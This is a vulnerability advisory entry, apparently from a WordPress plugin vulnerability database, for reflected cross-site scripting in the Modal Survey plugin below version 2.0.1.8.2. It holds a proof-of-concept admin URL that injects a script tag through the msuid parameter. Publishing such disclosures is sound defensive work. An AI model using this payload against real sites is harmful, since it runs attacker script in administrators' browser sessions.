WordPress Plugin Vulnerabilities

Modal Survey < 2.0.1.8.2 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin did not sanitise the msuid parameter from the survey participants page in the admin Dashboard, leading to a reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=modal_survey_participants&msuid=%27%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E

Affects Plugins

Plugin icon
modal_survey
Fixed in 2.0.1.8.2

References

URL
http://modalsurvey.pantherius.com/documentation/#line14

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.3 (high)

Miscellaneous

Original Researcher
Pagely
Submitter
John Castro
Submitter website
https://pagely.com/
Submitter twitter
pagely
Verified
No
WPVDB ID
1c21cf4e-d196-4edf-946e-70b78beaea01

Timeline

Publicly Published
2021-01-08 (about 3 years ago)
Added
2021-01-08 (about 3 years ago)
Last Updated
2021-01-09 (about 3 years ago)

Other

Published
Title
Published
2024-04-16
Title
HT Mega < 2.4.7 - Contributor+ Stored XSS via Lightbox Widget
Published
2021-08-23
Title
Fonts Plugin < 3.0.3 - Contributor+ Stored Cross-Site Scripting
Published
2022-12-29
Title
Passster < 3.5.5.8 - Contributor+ Stored Cross-Site Scripting
Published
2022-12-02
Title
Chained Quiz < 1.3.2.1 - Multiple Reflected Cross-Site Scripting
Published
2023-09-25
Title
Booking Calendar < 9.7.4 - Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode